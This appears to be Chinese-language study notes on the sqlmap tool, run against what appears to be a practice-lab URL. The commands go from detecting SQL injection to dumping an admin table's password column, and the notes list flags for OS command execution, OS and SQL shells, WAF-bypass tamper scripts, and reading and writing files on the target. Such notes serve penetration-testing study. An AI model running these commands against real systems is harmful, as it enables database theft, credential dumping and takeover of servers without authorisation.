sqlmap的使用

sqlmap安装：

sqlmap的使用：

window中：

探测是否存在漏洞

python sqlmap.py -u "http://rhiq8003.ia.aqlab.cn/?id=1"

 

查看所有的数据库 

python sqlmap.py -u "http://rhiq8003.ia.aqlab.cn/?id=1" --dbs

查看当前的数据库

python sqlmap.py -u "http://rhiq8003.ia.aqlab.cn/?id=1" --current-db

查看maoshe这个数据库中的表名

-D是指定数据库

python sqlmap.py -u "http://rhiq8003.ia.aqlab.cn/?id=1" -D maoshe --tables

 查看指定表中的列有哪些：

 python sqlmap.py -u "http://rhiq8003.ia.aqlab.cn/?id=1" -D maoshe -T admin --columns

查看指定列对应的数据有哪些：
python sqlmap.py -u "http://rhiq8003.ia.aqlab.cn/?id=1" -D maoshe -T admin -C Id,password --dump

常用参数

-v 设置回显等级 ， 默认为1

--level  设置探测等级。默认为1

--risk 设置风险等级。 

--users   枚举所有用户

--passwords 枚举所有密码

--current-user  显示当前用户

--os-cmd 

sqlmap -u " ***" --os-cmd = "net user"  执行系统命令。

--os-shell 返回一个shell界面

当请求方式为post时，我们可以使用 --data 或者-r参数来测试

-r  是将请求包放在一个txt文件中，直接测试。

也可以使用 --cookie  --user-agent --referer 等参数来指定这些字段值。

--cookie = "****"

--tamper "****.py"     使用tamper参数是为了绕过waf ，****.py是绕过waf的脚本文件。

--thread  设置线程数。

--sql-shell 返回一个交互式的shell命令行

--sql-query "***"    执行指定的sql语句。

读写文件：

--file-read "文件绝对路径"   读取该路径下的文件。

将本地的文件写入到目标系统中。

sqlmap -u [URL] --file-write “写入本地文件的地址” --file-dest “要写入的文件绝对路径”